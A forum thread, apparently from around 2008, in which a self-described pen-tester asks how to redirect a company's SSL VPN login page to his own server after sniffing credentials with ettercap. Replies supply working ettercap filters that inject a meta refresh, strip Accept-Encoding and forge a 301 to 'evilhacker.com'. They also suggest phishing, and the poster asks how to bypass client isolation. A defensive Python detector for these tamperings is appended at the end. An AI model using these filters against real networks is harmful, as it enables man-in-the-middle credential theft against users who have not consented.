
Thread: Website redirection

  1. #1
    Just burned his ISO
    Join Date
    Jan 2006
    Posts
    11

    Website redirection

    Hello folks!

    I am doing a pen-test for my company on their new website access. It's a website portal: basically you go to the site, log in with your username and password, and you will have access to the whole network (not the whole network, only if you are the CTO or the network admin).

    So I was able to catch the username and password using ettercap, but they use something called Host Checker, so my question is: how can I redirect a specific website using ettercap?

    I can do ARP spoofing and it works, but since I am doing a pen-test, the customer has an option called Host Checker. It's a little app that runs on the client machine and makes an SSL tunnel; the app checks for antivirus (if it is not up-to-date you won't be able to log in to their website). So, because of this app, I cannot sniff their password. So, here is my question again: how can I redirect the URL to my URL? For example, if they go to h**p://access.company.com I want to catch the request and send it to h**p://myapacheserver.com; they will see the same page. Actually, I already have everything in place, but I don't know yet how to do the website redirection. Any ideas? Suggestions? I am using ettercap, but I am open to using anything to achieve this.

    Thanks!

    <-SeRVer->

  2. #2
    Just burned his ISO
    Join Date
    Jul 2008
    Posts
    15


    Quote Originally Posted by Server:
    if they go to h**p://access.company.com I want to catch the request and send it to h**p://myapacheserver.com, they will see the same page, actually, I already have everything in place
    How about just mailing your victim some fake message which says: check the new extranet (url), but in your HTML it is your URL. That's basically phishing.

    Or if you have an account, search for HTML injection vulnerabilities and try to redirect.
    Two things are infinite: the universe and human stupidity;

  3. #3
    hawaii67 (Member)
    Join Date
    Feb 2006
    Posts
    318


    Maybe you could try something like this:

    Code:
    # Match HTTP responses (source port 80) and inject a meta refresh before the
    # closing head tag; the quotes inside the string must be escaped with \"
    if (ip.proto == TCP && tcp.src == 80) {
        replace("</head>", "<meta http-equiv=\"Refresh\" content=\"1; url=http://myapacheserver.com\"></head>");
        msg("Filter Ran.\n");
    }
    Of course you could also filter just for the page h**p://access.company.com.
    Don't eat yellow snow :rolleyes:

  4. #4
    imported_wyze (Jenkem Addict)
    Join Date
    Jul 2007
    Posts
    1,543


    Is the AP wired or wireless?
    dd if=/dev/swc666 of=/dev/wyze

  5. #5
    Just burned his ISO
    Join Date
    Jan 2006
    Posts
    11


    Thanks for the response.

    Well, they do have an AP, but they use the client isolation option (does anyone know how to break/bypass this option?).

    hawaii67, I didn't try that, because all the traffic would be redirected to my website. If the client tries to go to google.com I don't want them to see my page, only if they want to go to access.mycompany.com.

    Any other ideas?

    Thanks!!!

    <-SeRVer->

  6. #6
    hawaii67 (Member)
    Join Date
    Feb 2006
    Posts
    318


    Here's the spoonfilter:

    Code:
    # Only touch responses coming from the target web server's IP on port 80;
    # inject the meta refresh right after the opening head tag (quotes escaped)
    if (ip.src == 'aa.bb.cc.dd' && tcp.src == 80) {
          replace("<head>", "<head> <meta http-equiv=\"Refresh\" content=\"0; url=http://myapacheserver.com\">");
          msg("Replaced URL\n");
    }
    Where aa.bb.cc.dd is the IP address of access.company.com.
    If an nslookup reveals more IP addresses, use this instead:

    Code:
    # Same filter body as above, matching any of the server's addresses
    if (ip.src == 'aa.bb.cc.dd' || ip.src == 'ee.dd.ff.gg' || ip.src == 'hh.ii.jj.kk') {
          replace("<head>", "<head> <meta http-equiv=\"Refresh\" content=\"0; url=http://myapacheserver.com\">");
          msg("Replaced URL\n");
    }

    It works fine for me :-)

    Cheers
    Don't eat yellow snow :rolleyes:

  7. #7
    Good friend of the forums
    Join Date
    Feb 2010
    Posts
    328


    Quote Originally Posted by hawaii67:
    Here's the spoonfilter:
    wonder what a 302 would look like ..

    replace
    GET / HTTP/1.1
    Host: www.google.com
    HTTP/1.x 200 OK

    with:
    GET / HTTP/1.1
    Host: www.google.com
    HTTP/1.x 301 Moved Permanently
    Location: http://evilhacker.com

  8. #8
    Just burned his ISO
    Join Date
    Jan 2006
    Posts
    11


    Well, it's not working for me. The website runs on HTTPS, but accepts the request on HTTP and then redirects to HTTPS, and I got lost in the transition.

    Here is the source of HTTP (80):

    <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
    <HTML DIR="LTR">
    <HEAD>
    <link rel="stylesheet" type="text/css" href="ErrorPageTemplate.css" >
    <META NAME="MS.LOCALE" CONTENT="EN-US">
    <META HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=utf-8">
    <META HTTP-EQUIV="MSThemeCompatible" CONTENT="Yes">
    <TITLE>Certificate Error: Navigation Blocked</TITLE>

    <SCRIPT src="errorPageStrings.js" LANGUAGE="javascript" type="text/javascript">
    </SCRIPT>
    <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">
    </script>
    <SCRIPT src="invalidcert.js" LANGUAGE="javascript" type="text/javascript">
    </SCRIPT>

    </HEAD>

    And here is the HTTPS (443):

    <html>
    <head>
    <meta http-equiv="Content-Language">
    <meta http-equiv="Content-Type" content="text/html">
    <meta name="robots" content="none">
    <title>Secure Access SSL VPN</title>

    <script src="/dana-na/css/ds.js"></script>
    <script>
    WriteCSS();
    </script>
    <noscript>
    <link rel="stylesheet" href="/dana-na/css/ds.css">
    </noscript>

    <script>
    <!--
    if (window.top != self) {
    top.location = location;
    }
    if(window.name == "newpincancel" || window.name == "nexttokencancel") {
    window.close();
    }
    //--></script>
    <script src="/dana-na/auth/lastauthserverused.js"></script>
    <script>function deletepreauth() {
    document.cookie = "DSPREAUTH="+ escape("")+ ";path=/dana-na/;expires=12-Nov-1996";
    }
    </script>

    </head>

    I also changed the filter for 443, and nothing. My guess is I lost the connection, or the filter doesn't redirect the traffic after the first request on port 80.

    Any ideas?

    Thanks!!!

    <-SeRVer->

  9. #9
    hawaii67 (Member)
    Join Date
    Feb 2006
    Posts
    318


    It looks like the code injection doesn't work. The redirection should take place immediately, while the communication is still on port 80.
    Do you get the message "Replaced URL"?

    Did you try this filter:

    Code:
    # Strip Accept-Encoding from client requests so the server replies with
    # plain (uncompressed) HTML that the second filter can edit in transit
    if (ip.proto == TCP && tcp.dst == 80) {
       if (search(DATA.data, "Accept-Encoding")) {
          replace("Accept-Encoding", "Accept-Rubbish!");
              # note: replacement string is same length as original string
          msg("zapped Accept-Encoding!\n");
       }
    }

    # Inject the meta refresh after the opening head tag in either case;
    # quotes inside the replacement strings are escaped with \"
    if (ip.src == 'aa.bb.cc.dd' && tcp.src == 80) {
          replace("<head>", "<head> <meta http-equiv=\"Refresh\" content=\"0; url=http://myapacheserver.com\">");
          replace("<HEAD>", "<HEAD> <meta http-equiv=\"Refresh\" content=\"0; url=http://myapacheserver.com\">");
          msg("Replaced URL\n");
    }
    Don't eat yellow snow :rolleyes:

  10. #10
    Just burned his ISO
    Join Date
    Jan 2006
    Posts
    11


    Yes, your filter works! But not in my scenario. I don't know why the redirection doesn't work; I get the message and everything, but the redirection doesn't occur.

    I pointed the filter at a private website and redirected to my page, and it works just fine. Here is what I have so far:

    if the user goes to:

    h**p://access.mycompany.com

    they get a "The page cannot be displayed" error, so

    they need to go to:

    h**p://access.mycompany.com/users

    then they can log in.

    Here are the headers of the requests.

    Fri Aug 15 13:26:46 2008 [980716]
    UDP 1.248.5.133:1605 --> 1.248.5.1:53 |

    .............access.mycompany.com.....

    Fri Aug 15 13:26:46 2008 [984471]
    UDP 1.248.5.1:53 --> 1.248.5.133:1605 |

    .............access.mycompany.com................. H...

    Fri Aug 15 13:26:46 2008 [985432]
    TCP 1.248.5.133:4368 --> 11.22.33.44.55:80 | S



    Fri Aug 15 13:26:46 2008 [990727]
    TCP 11.22.33.44.55:80 --> 1.248.5.133:4368 | SA



    Fri Aug 15 13:26:46 2008 [991285]
    TCP 1.248.5.133:4368 --> 11.22.33.44.55:80 | A



    Fri Aug 15 13:26:46 2008 [991496]
    TCP 1.248.5.133:4368 --> 11.22.33.44.55:80 | AP

    GET /users HTTP/1.1.
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*.
    Accept-Language: en-us.
    UA-CPU: x86.
    Accept-Encoding: gzip, deflate.
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727).
    Host: access.mycompany.com.
    Connection: Keep-Alive.
    .


    Fri Aug 15 13:26:46 2008 [992380]
    TCP 11.22.33.44.55:80 --> 1.248.5.133:4368 | A



    Fri Aug 15 13:26:46 2008 [992668]
    TCP 11.22.33.44.55:80 --> 1.248.5.133:4368 | AP

    HTTP/1.0 301 Moved Permanently.
    Connection: close.
    Location: h**ps://access.mycompany.com/users.
    .


    Fri Aug 15 13:26:46 2008 [992677]
    TCP 11.22.33.44.55:80 --> 1.248.5.133:4368 | FA



    Fri Aug 15 13:26:46 2008 [993214]
    TCP 1.248.5.133:4368 --> 11.22.33.44.55:80 | A



    Fri Aug 15 13:26:46 2008 [993506]
    TCP 1.248.5.133:4368 --> 11.22.33.44.55:80 | FA



    Fri Aug 15 13:26:46 2008 [994067]
    TCP 11.22.33.44.55:80 --> 1.248.5.133:4368 | A



    Fri Aug 15 13:26:46 2008 [996799]
    TCP 1.248.5.133:4369 --> 11.22.33.44.55:443 | S



    Fri Aug 15 13:26:47 2008 [231298]
    TCP 11.22.33.44.55:443 --> 1.248.5.133:4369 | SA



    Fri Aug 15 13:26:47 2008 [335762]
    TCP 11.22.33.44.55:443 --> 1.248.5.133:4369 | R



    Fri Aug 15 13:26:51 2008 [708266]
    TCP 1.248.5.133:4370 --> 11.22.33.44.55:80 | S



    Fri Aug 15 13:26:51 2008 [709319]
    TCP 11.22.33.44.55:80 --> 1.248.5.133:4370 | SA



    Fri Aug 15 13:26:51 2008 [709837]
    TCP 1.248.5.133:4370 --> 11.22.33.44.55:80 | A



    Fri Aug 15 13:26:51 2008 [710034]
    TCP 1.248.5.133:4370 --> 11.22.33.44.55:80 | AP

    GET /users HTTP/1.1.
    Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*.
    Accept-Language: en-us.
    UA-CPU: x86.
    Accept-Encoding: gzip, deflate.
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; InfoPath.2; .NET CLR 2.0.50727).
    Host: access.mycompany.com.
    Connection: Keep-Alive.
    .


    Fri Aug 15 13:26:51 2008 [710948]
    TCP 11.22.33.44.55:80 --> 1.248.5.133:4370 | A



    Fri Aug 15 13:26:51 2008 [711230]
    TCP 11.22.33.44.55:80 --> 1.248.5.133:4370 | AP

    HTTP/1.0 301 Moved Permanently.
    Connection: close.
    Location: h**ps://access.mycompany.com/users.

    Thanks for all the help!!!!
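The two tamperings the filters in this thread rely on, seen from the detection side, as an added example that is not from the thread or from ettercap: it checks a captured request for a renamed Accept-Encoding header (post #9's "Accept-Rubbish!") and a captured response for an injected off-site meta refresh, and it reports the bodiless 301 from post #10, which is why that filter found no <head> to replace. The sample messages are constructed here; access.mycompany.com and myapacheserver.com are the placeholders the thread already uses.

```python
import re
from urllib.parse import urlparse
# Header names a plain browser request carries (the set seen in the post #10 capture)
EXPECTED_REQ_HEADERS = {"accept", "accept-language", "ua-cpu", "accept-encoding",
                        "user-agent", "host", "connection"}
META_REFRESH = re.compile(
    r'<meta\s+http-equiv=["\']?refresh["\']?\s+content=["\']?\s*\d+\s*;\s*url=([^"\'>\s]+)',
    re.IGNORECASE)
# Constructed samples that mirror the thread; not real captures
TAMPERED_REQUEST = (b"GET /users HTTP/1.1\r\nAccept-Rubbish!: gzip, deflate\r\n"
                    b"User-Agent: Mozilla/4.0 (compatible; MSIE 7.0)\r\n"
                    b"Host: access.mycompany.com\r\n\r\n")
INJECTED_PAGE = (b"HTTP/1.1 200 OK\r\nContent-Type: text/html\r\n\r\n<html><head> "
                 b'<meta http-equiv="Refresh" content="0; url=http://myapacheserver.com">'
                 b"<title>Secure Access SSL VPN</title></head></html>")
BODILESS_301 = (b"HTTP/1.0 301 Moved Permanently\r\nConnection: close\r\n"
                b"Location: https://access.mycompany.com/users\r\n\r\n")

def split_message(raw: bytes):
    """Split an HTTP/1.x message into (start line, {lowercase name: value}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body

def check_request(raw: bytes) -> list:
    """Flag a request whose Accept-Encoding was renamed in transit: the post #9
    filter turns it into 'Accept-Rubbish!' so the server answers uncompressed."""
    _, headers, _ = split_message(raw)
    findings = [f"unexpected request header {name!r}"
                for name in headers if name not in EXPECTED_REQ_HEADERS]
    if "accept-encoding" not in headers and "mozilla" in headers.get("user-agent", "").lower():
        findings.append("browser request without Accept-Encoding")
    return findings

def check_response(raw: bytes, expected_host: str) -> list:
    """Flag a meta refresh in the body that points off-site, and report a
    bodiless redirect, which is why the filter found no <head> in the 301."""
    status, headers, body = split_message(raw)
    findings = []
    if status.split()[1].startswith("3") and not body:
        findings.append(f"bodiless redirect to {headers.get('location')}")
    for m in META_REFRESH.finditer(body.decode("iso-8859-1")):
        host = urlparse(m.group(1)).hostname
        if host and host.lower() != expected_host.lower():
            findings.append(f"meta refresh to foreign host {host}")
    return findings
```

Running the checks over the three constructed messages shows the renamed header, the off-site meta refresh, and the empty-bodied redirect that the HTTP-to-HTTPS hop produces.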
